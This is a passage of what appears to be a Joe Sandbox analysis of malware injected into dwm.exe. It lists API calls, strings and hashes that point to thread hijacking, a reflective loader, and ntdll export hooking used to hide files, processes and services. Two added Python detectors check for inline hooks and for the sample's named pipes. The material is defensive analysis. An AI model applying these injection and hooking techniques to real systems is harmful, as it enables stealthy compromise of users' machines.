                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction ID: fa86b2a9f44b472905bfb38af4152c87717321f78ab600eecce9153a85f1924f
                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                        • Instruction Fuzzy Hash: 9D711D36B10A18C6EB109F65EC9869973B4F794B8CF025212DE4E87B6DEF3AC445C784

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModule
                        • String ID: wr
                        • API String ID: 1092925422-2678910430
                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction ID: 70c650b70df424567e79b71cf095d565d0b1e69e1e0bdd4a48dd4f5053c07e14
                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                        • Instruction Fuzzy Hash: 03116136B0474582FF149B25F90876976B4F748B89F460229DE8907759EF3EC605C744

                        Control-flow Graph

                        • Control-flow graph for the function at 26db1675b30 (raw graph data not rendered). Recoverable call sites: GetCurrentThreadId (block 26db1675b6b), GetThreadContext (block 26db1675cbc), SetThreadContext (block 26db1675d3e), VirtualProtect and FlushInstructionCache (block 26db1675e41), ResumeThread (block 26db1675f37). SetThreadContext and ResumeThread lie on the path taken after GetThreadContext succeeds: the get-context / set-context / resume sequence used to redirect an existing thread.
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Thread$Current$Context
                        • String ID:
                        • API String ID: 1666949209-0
                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction ID: 843d86674cc97658883fe1d0c57f2d78ce8a5df95176ad36f675bd71f88513af
                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                        • Instruction Fuzzy Hash: 1DD1AA36705B88C2DB709B0AE89835A77A0F389B98F114256EEDD47BA9DF3DC541CB40

                        Control-flow Graph

                        • Control-flow graph for the function at 26db16750d0 (raw graph data not rendered). Recoverable call sites: GetCurrentThreadId (block 26db1675156), VirtualProtect (block 26db16755c8) followed by GetLastError on failure (block 26db1675663).
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction ID: b89488e72139483f15850ce0627679f5db94ed58393c5abb01e1e75090cb23dc
                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                        • Instruction Fuzzy Hash: D602CA32619B8886EB60CB55F89835AB7A0F3C5798F214115EA9E87BACDF7DC444CB40

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Virtual$AllocQuery
                        • String ID:
                        • API String ID: 31662377-0
                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction ID: 514a14e89455809bd5bd7bcc7831bad33432b67c68047ea4c118eadd231905df
                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                        • Instruction Fuzzy Hash: E931F432F19A8881EA70EB15E85935E66A4F38878CF110725FDCD46B9CDF7EC6408B84

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                        • String ID:
                        • API String ID: 1683269324-0
                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction ID: c1da28291e4c46b1bed6e3a72131b0d813ed707056273a2e634cae2ad9a90ae6
                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                        • Instruction Fuzzy Hash: C6118C31F1568C82FB70AB21FD0D36922A4AB5835DF524329DE4A8169DEF7BC24886C0

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                        • String ID:
                        • API String ID: 3733156554-0
                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction ID: 3cd728b104b029a5c99facff4c4f26c68678a1ff6bf2ecf97b09fe41d434a4f4
                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                        • Instruction Fuzzy Hash: 68F0D036719B08C1D630DB05E85975AABA0F3887E8F154615FE8D47B6DCE3EC6908B80

                        Control-flow Graph

                        • Control-flow graph for the function at 26db15b273c (raw graph data not rendered). Recoverable call sites: VirtualAlloc (block 26db15b27c5), then LoadLibraryA (block 26db15b2858) inside a loop (26db15b2858 -> 26db15b28ca -> 26db15b2858), consistent with an allocate-then-resolve-imports loader.
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: AllocLibraryLoadVirtual
                        • String ID:
                        • API String ID: 3550616410-0
                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction ID: 704898ec6948a2b12555e552dbb8ff9f12bb3bee1bb8d44bc6a3711bb5236a1e
                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                        • Instruction Fuzzy Hash: FF61CE32B0169C87EB548F15980873AB3E2F754BE8F598125EE5D07788DB39E893C724

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0000026DB1671628: GetProcessHeap.KERNEL32 ref: 0000026DB1671633
                          • Part of subcall function 0000026DB1671628: HeapAlloc.KERNEL32 ref: 0000026DB1671642
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16716B2
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16716DF
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16716F9
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671719
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB1671734
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671754
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB167176F
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB167178F
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16717AA
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB16717CA
                        • Sleep.KERNEL32 ref: 0000026DB1671AD7
                        • SleepEx.KERNELBASE ref: 0000026DB1671ADD
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16717E5
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671805
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB1671820
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB1671840
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB167185B
                          • Part of subcall function 0000026DB1671628: RegOpenKeyExW.ADVAPI32 ref: 0000026DB167187B
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB1671896
                          • Part of subcall function 0000026DB1671628: RegCloseKey.ADVAPI32 ref: 0000026DB16718A0
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CloseOpen$HeapSleep$AllocProcess
                        • String ID:
                        • API String ID: 1534210851-0
                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction ID: 412db2072bf8229ff69195498fa334a25a9ab84462f24d848b41469eccab06f3
                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                        • Instruction Fuzzy Hash: 743123B1B00649C2FF50DF26DE593B913A4AB98FD8F0A56238E09872DDFF12C451C290

                        Control-flow Graph

                        • Control-flow graph for the function at 26db1672b2c (raw graph data not rendered). Recoverable call sites: GetModuleHandleA then GetProcAddress (blocks 26db1672bc9-26db1672beb), StrCmpNIW (block 26db1672c14), lstrlenW (blocks 26db1672d4b and 26db1672e05). Together with the strings below, the function resolves NtQueryObject from ntdll.dll and compares object names against \Device\Nsi.
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                        • API String ID: 2119608203-3850299575
                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction ID: 13ca0a463e51e1150cf6cae80a107a988cd7bba390a73246de8c0d59a73ccc38
                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                        • Instruction Fuzzy Hash: 51B1B172B10A9882EBA4CF25CC487A963A5F744B8CF56521AEE495379CDF36CC80C7C0
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                        • String ID:
                        • API String ID: 3140674995-0
                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction ID: 9b3698264559ceb9ab7f126f0999cdc689ae2943471866efe597d9dbf9fd7fd1
                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                        • Instruction Fuzzy Hash: FF31A972704B848AEB608F60E8983EE7360F794708F45452ADB4E47B98EF3AC648C740
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                        • String ID:
                        • API String ID: 1239891234-0
                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction ID: d4858ab6b594ffbafe51a02d34d190278b553c25c1bba8a9609db547e092d85c
                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                        • Instruction Fuzzy Hash: AC315E32714B8486EB60CF25EC483AE73A4F799768F510226EE9D47B98EF39C545CB40

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                        • String ID: d
                        • API String ID: 2005889112-2564639436
                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction ID: 4ec10fdf5898cec52b9fc58856d0a220b6ffad920313d5bf61f13301b79789d7
                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                        • Instruction Fuzzy Hash: B9514A36B00B8886EB54CF66E94835A77A1F798F99F054126DE890772DEF3DC049C780

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentThread$AddressHandleModuleProc
                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                        • API String ID: 4175298099-1975688563
                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction ID: 3455a8e4cfdd6f64cd38f3b2ef82d73cf3a312a98173465fe80c84695968cfb3
                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                        • Instruction Fuzzy Hash: E931C3B4F00A4EE1EA00EFA9EC697E42360B71478CF924257D8595216D9F3A8A49C3E0
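
The exports in the String ID above (NtQueryDirectoryFile, NtQuerySystemInformation, NtEnumerateKey, NtEnumerateValueKey, EnumServicesStatusExW, ...) are the functions an application calls to list files, processes, registry keys and services; the function resolves them by name from ntdll.dll, advapi32.dll and sechost.dll so that their entry points can be overwritten, which is how listings get filtered from user mode. A responder working from this report would want to check whether those entry points are still intact in the process the code was injected into. The script below is an added example, not code from the Joe Sandbox report or from the sample: it classifies the first bytes of an x64 ntdll export as a clean syscall stub or as one of the common detour forms, and offers a pattern-free memory-versus-disk comparison for exports such as EnumServicesStatusExW that are not syscall stubs. The addresses, bytes and syscall numbers in SAMPLE are constructed for the example and are not real values; on a live host you would read the first 16 bytes of each export from the target process and the same bytes from the module on disk.

```python
"""Inline-hook check for x64 ntdll syscall stubs.

Added example, not code from the Joe Sandbox report or from the analysed sample.
A clean x64 Nt* stub always begins
  4C 8B D1          mov r10, rcx
  B8 xx xx xx xx    mov eax, <syscall number>
so anything else at the entry point is a detour.  Addresses, bytes and syscall
numbers in SAMPLE are constructed for the example and are not real values.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

MASK64 = (1 << 64) - 1


@dataclass
class StubVerdict:
    name: str
    hooked: bool
    reason: str
    syscall_number: Optional[int] = None
    target: Optional[int] = None  # hook destination, when it can be computed


def classify_stub(name: str, address: int, prologue: bytes) -> StubVerdict:
    """Classify the first bytes of an export that is mapped at `address`."""
    # Clean stub: mov r10, rcx ; mov eax, imm32
    if prologue[:4] == b"\x4c\x8b\xd1\xb8" and len(prologue) >= 8:
        ssn = int.from_bytes(prologue[4:8], "little")
        return StubVerdict(name, False, "syscall stub", syscall_number=ssn)
    # E9 rel32: jmp rel32, the most common detour
    if prologue[:1] == b"\xe9" and len(prologue) >= 5:
        rel = int.from_bytes(prologue[1:5], "little", signed=True)
        return StubVerdict(name, True, "jmp rel32 at entry",
                           target=(address + 5 + rel) & MASK64)
    # FF 25 disp32: jmp [rip+disp32]; the 8-byte pointer usually follows the instruction
    if prologue[:2] == b"\xff\x25" and len(prologue) >= 6:
        disp = int.from_bytes(prologue[2:6], "little", signed=True)
        ptr_off = 6 + disp
        target = None
        if 0 <= ptr_off and ptr_off + 8 <= len(prologue):
            target = int.from_bytes(prologue[ptr_off:ptr_off + 8], "little")
        return StubVerdict(name, True, "jmp [rip+disp32] at entry", target=target)
    # 48 B8 imm64 ; FF E0: mov rax, imm64 ; jmp rax
    if prologue[:2] == b"\x48\xb8" and len(prologue) >= 12 and prologue[10:12] == b"\xff\xe0":
        return StubVerdict(name, True, "mov rax,imm64 / jmp rax at entry",
                           target=int.from_bytes(prologue[2:10], "little"))
    # 68 imm32 ; C3: push imm32 ; ret
    if prologue[:1] == b"\x68" and len(prologue) >= 6 and prologue[5:6] == b"\xc3":
        return StubVerdict(name, True, "push imm32 / ret at entry",
                           target=int.from_bytes(prologue[1:5], "little"))
    return StubVerdict(name, True, "unrecognised prologue")


def prologue_differs(in_memory: bytes, on_disk: bytes, length: int = 16) -> bool:
    """Pattern-free check for non-stub exports: compare mapped bytes with the file's bytes."""
    return in_memory[:length] != on_disk[:length]


def scan(exports: Dict[str, Tuple[int, bytes]]) -> Dict[str, StubVerdict]:
    """Classify every export in `exports` ({name: (address, first bytes)})."""
    return {name: classify_stub(name, addr, data) for name, (addr, data) in exports.items()}


def hooked_names(exports: Dict[str, Tuple[int, bytes]]) -> list:
    """Sorted names of exports whose entry point is not a clean syscall stub."""
    return sorted(name for name, v in scan(exports).items() if v.hooked)


# Constructed sample: hypothetical in-memory prologues of the exports named in the report.
SAMPLE: Dict[str, Tuple[int, bytes]] = {
    "NtQueryDirectoryFile":     (0x7FF812340000, bytes.fromhex("4c8bd1b835000000f604250803fe7f01")),
    "NtQueryDirectoryFileEx":   (0x7FF812340800, bytes.fromhex("4c8bd1b8ee000000f604250803fe7f01")),
    "NtQuerySystemInformation": (0x7FF812341000, bytes.fromhex("e9fb0f0000cc9090909090909090cccc")),
    "NtEnumerateKey":           (0x7FF812341800, bytes.fromhex("48b800203412f87f0000ffe090909090")),
    "NtEnumerateValueKey":      (0x7FF812342800, bytes.fromhex("ff250000000000203412f87f00009090")),
    "NtDeviceIoControlFile":    (0x7FF812343000, bytes.fromhex("4c8bd1b807000000f604250803fe7f01")),
    "NtResumeThread":           (0x7FF812343800, bytes.fromhex("4c8bd1b852000000f604250803fe7f01")),
}


if __name__ == "__main__":
    for name, v in scan(SAMPLE).items():
        tgt = f" -> {v.target:#x}" if v.target is not None else ""
        print(f"{name:26s} {'HOOKED' if v.hooked else 'clean ':6s} {v.reason}{tgt}")
```

An E9, FF 25 or mov rax/jmp rax at the entry of any Nt* stub is the finding; the resolved target is the hook body, which should be compared with the module ranges listed in the memory dump sources of this report rather than with ntdll's own range. For the advapi32/sechost exports (EnumServicesStatusExW, EnumServiceGroupW) only prologue_differs applies, since they are ordinary functions and not syscall stubs. Note that relocations make a raw disk-versus-memory comparison noisy for some prologues; the first 16 bytes of a syscall stub contain no relocated pointers, which is why the pattern check is the primary test.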

                        Control-flow Graph

                        • Control-flow graph for the function at 26db15b6910 (raw graph data not rendered): CRT start-up code (__scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c and the internal calls between 26db15b6e0c and 26db15bac0c) with no Win32 API call sites of its own.
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                        • API String ID: 190073905-1786718095
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 196aad8575f1ee3d1c37c55aaf84a8b607eeb7ed88bf68c6814e311fd5fb6855
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: A081B031F1024D8AFA509F669C493BB62F1EB8578CF5680259905877DEDF7BC845870C

                        Control-flow Graph

                        APIs
                        • GetLastError.KERNEL32 ref: 0000026DB167CE37
                        • FlsGetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CE4C
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CE6D
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CE9A
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CEAB
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CEBC
                        • SetLastError.KERNEL32 ref: 0000026DB167CED7
                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF0D
                        • FlsSetValue.KERNEL32(?,?,00000001,0000026DB167ECCC,?,?,?,?,0000026DB167BF9F,?,?,?,?,?,0000026DB1677AB0), ref: 0000026DB167CF2C
                          • Part of subcall function 0000026DB167D6CC: HeapAlloc.KERNEL32 ref: 0000026DB167D721
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF54
                          • Part of subcall function 0000026DB167D744: HeapFree.KERNEL32 ref: 0000026DB167D75A
                          • Part of subcall function 0000026DB167D744: GetLastError.KERNEL32 ref: 0000026DB167D764
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF65
                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026DB1680A6B,?,?,?,0000026DB168045C,?,?,?,0000026DB167C84F), ref: 0000026DB167CF76
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Value$ErrorLast$Heap$AllocFree
                        • String ID:
                        • API String ID: 570795689-0
                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction ID: 301ed5bb14b064f6288e9b6d371b203e0a3ce77f361148a81f8be7547da9ff02
                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                        • Instruction Fuzzy Hash: 4C41A230F0164D82FA68A7355D5D77922825F947FCF260B24AD36466EEFE2B984183C0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                        • API String ID: 2171963597-1373409510
                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction ID: a6316b0979e2fbe67aa6ecb4ef3804c197afbec74b3d3972a628f3e879a6a2a9
                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                        • Instruction Fuzzy Hash: 4A213D32B14B4483EB108B25F94875963A1F799BA8F510316EA5906BA8CF7DC549CB40
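The function above, recovered from the code injected into dwm.exe, carries the two named-pipe strings `\\.\pipe\dialerchildproc32` and `\\.\pipe\dialerchildproc64` alongside process-creation, file and Wow64 thread APIs, which is the pipe-based parent/child channel an analyst would hunt for on other hosts. The script below is an added example, not part of the Joe Sandbox output or of the sample: it flags Sysmon-style pipe events (Event ID 17 PipeCreated / 18 PipeConnected) whose pipe name matches either string, and on a Windows host can additionally list currently open pipes. The `Key: value | Key: value` event lines are constructed for illustration and are not taken from the report; the pipe names are.

```python
"""Flag named-pipe activity matching the pipe names recovered from the injected
dwm.exe code in this report. Added example; not part of the sandbox output.
The Sysmon-like event lines are constructed for illustration."""
import os
import re
import sys

# Pipe names recovered from the report's string references (\\.\pipe\ prefix dropped).
SUSPICIOUS_PIPES = {"dialerchildproc32", "dialerchildproc64"}

# Sysmon event IDs for PipeCreated and PipeConnected.
PIPE_EVENT_IDS = {"17", "18"}


def normalize_pipe_name(raw: str) -> str:
    """Reduce '\\\\.\\pipe\\Foo', '\\Foo' (Sysmon style) or 'Foo' to bare 'foo'."""
    name = raw.strip()
    name = re.sub(r"^\\\\\.\\pipe\\", "", name, flags=re.IGNORECASE)
    return name.lstrip("\\").lower()


def parse_event(line: str) -> dict:
    """Parse one constructed 'Key: value | Key: value' event line into a dict."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def flag_pipe_events(lines):
    """Return (event_id, image, pipe) for pipe events naming a suspicious pipe."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") not in PIPE_EVENT_IDS:
            continue
        pipe = normalize_pipe_name(ev.get("PipeName", ""))
        if pipe in SUSPICIOUS_PIPES:
            hits.append((int(ev["EventID"]), ev.get("Image", "?"), pipe))
    return hits


def flag_live_pipes():
    """On Windows, list open pipes and return the suspicious ones (empty elsewhere)."""
    if sys.platform != "win32":
        return []
    return sorted(
        normalize_pipe_name(p)
        for p in os.listdir(r"\\.\pipe\\")
        if normalize_pipe_name(p) in SUSPICIOUS_PIPES
    )


# Constructed sample events: two hits, one benign pipe, one non-pipe event.
SAMPLE_EVENTS = [
    "EventID: 17 | Image: C:\\Windows\\System32\\dwm.exe | PipeName: \\dialerchildproc64",
    "EventID: 18 | Image: C:\\Windows\\System32\\svchost.exe | PipeName: \\DIALERCHILDPROC32",
    "EventID: 17 | Image: C:\\Windows\\System32\\lsass.exe | PipeName: \\lsass",
    "EventID: 1 | Image: C:\\Windows\\System32\\dwm.exe | CommandLine: dwm.exe",
]

if __name__ == "__main__":
    for event_id, image, pipe in flag_pipe_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {image} -> \\\\.\\pipe\\{pipe}")
    for pipe in flag_live_pipes():
        print(f"live pipe present: \\\\.\\pipe\\{pipe}")
```

Matching is case-insensitive and tolerant of the `\\.\pipe\` prefix because Sysmon records the pipe as `\name` while the sample's own strings carry the full device path; the image path is reported with each hit so a pipe created from dwm.exe, as in this report, stands out from the same name appearing elsewhere.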
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
